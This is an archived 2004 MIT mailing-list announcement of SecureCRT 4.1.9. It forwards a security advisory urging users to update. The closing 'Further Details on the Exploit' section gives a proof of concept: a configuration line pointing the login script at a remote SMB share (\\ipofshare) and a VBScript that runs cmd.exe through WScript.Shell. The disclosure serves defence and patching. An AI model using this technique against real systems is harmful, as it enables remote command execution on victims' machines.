[WinPartners] SecureCRT 4.1.9 Release Announcement
Atticus Gifford
atticus at MIT.EDU
Thu Dec 2 14:55:23 EST 2004
Date: Thursday, 2 December 2004
To: MIT Community: itpartners at mit.edu, winpartners at mit.edu,
sw-release-announce at mit.edu, kakapo at mit.edu
Cc: itag at mit.edu, is&t at mit.edu
From: Software Release Team
Subject: SecureCRT 4.1.9 Release Announcement
Good Afternoon,
On behalf of the SecureCRT Release Team, I am pleased to announce the
release of SecureCRT 4.1.9. This update to SecureCRT includes a fix for
a critical vulnerability in earlier versions of SecureCRT. It is
recommended that all users update immediately to this latest version.
For more information on the security threat patched in this version of
SecureCRT please see the MIT IT Security Support Security Advisory
copied at the end of this message.
This new installer also fixes several bugs in the SecureCRT 4.1.4
installer, particularly for user accounts running SecureCRT other than
the administrator who installed the software.
Notable Features of SecureCRT 4.1.9:
---------------------------------
- Includes 4.1.9 binaries with critical security patch
- Adds path to VSH and VCP to PATH variable (for users who would like
to use the command line)
- First-time users (i.e. anyone but the account that installed
SecureCRT) will only see a quick, one-time repair that doesn't require
the installer to be on the user's system
- New "Create Athena Shortcut" item in the SecureCRT Program Files
folder will create (and ask to overwrite if it exists) a shortcut to
Athena. This is instead of creating a shortcut via repair. Only the
installing account will have this shortcut automatically.
- Running the "Create Athena Shortcut" item will allow the user to
create a GSSAPI (Kerberos Tickets) shortcut to Athena if they prefer
(click Options... button)
Known Issues:
-------------
There are no known issues for this version of KfW.
How to Obtain:
--------------
You can download SecureCRT 4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Getting Help:
-------------
The SecureCRT 4.1.9 page is located at:
http://itinfo.mit.edu/product?vid=623
If you have a question or need assistance, please contact the Computing
Help Desk at computing-help at mit.edu or x3-1101.
Thanks,
Atticus
----------------
Atticus Gifford
Installer Writer - Software Release Team
Information Services and Technology (IS&T)
Massachusetts Institute of Technology
Room W92-176
Cambridge, MA 02139
t: 617-452-2095
m: atticus at mit.edu
------------ MIT ITSS Security Advisory -----------
From: mvan at MIT.EDU
Subject: Security Advisory: Critical SecureCRT for Windows
Vulnerability
Date: December 2, 2004 12:52:31 PM EST
To: security-fyi at mit.edu
Cc: itss at mit.edu, swrt at mit.edu
Greetings,
Please be aware of the following security threat concerning SecureCRT
V4.1 and earlier, and see below for further details:
=============================================================
Date: November 23, 2004
Advisory: NTBugtraq Advisory
Affected: SecureCRT V4.1, V4.0 (and probably lower)
Impact: All Windows platforms using SecureCRT -- Critical
Action to Take: Update to Secure CRT V4.1.9
=============================================================
You can download Secure CRT V4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Notable Features of SecureCRT V4.1.9:
------------------------------
- Includes 4.1.9 binaries
- Adds path to VSH and VCP to PATH variable (for users who would like
to use the command line)
- First-time users (i.e. anyone but the account that installed
SecureCRT) will only see a quick, one-time repair that doesn't require
the installer to be on the user's system
- New "Create Athena Shortcut" item in the SecureCRT Program Files
folder will create (and ask to overwrite if it exists) a shortcut to
Athena. This is instead of creating a shortcut via repair. Only the
installing account will have this shortcut automatically.
- Running the "Create Athena Shortcut" item will allow the user to
create a GSSAPI (Kerberos Tickets) shortcut to Athena if they prefer
(click Options... button)
Known Issues:
-------------
There are no known issues for this version of SecureCRT 4.1.9.
How to Obtain:
--------------
You can download Secure CRT V4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Getting Help:
-------------
If you have a question or need assistance, please contact the Computing
Help Desk at computing-help at mit.edu or x3-1101.
Further Details on the Exploit:
--------------
There appears to be some filtering around the use of \ in the
url->command line parsing, that prevents the specification of an SMB
share to use for configuration. This can be easily bypassed and leads
to the loading of a configuration file from a remote site.
The configuration file contains an entry that specifies the login
script to run which can be set a file on the the remote share;
S:"Script Filename"=\\ipofshare\share\folder\scriptname
And the login script can then contain scripting such as;
# $language = "VBScript"
# $interface = "1.0"
Sub Main
dim wshShell, boolErr, strErrDesc
Set wshShell = CreateObject("WScript.Shell")
run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
End Sub
Mark Van Dyke
IT Security Support
MIT Information Services & Technology
mvan at mit.edu
More information about the winpartners
mailing list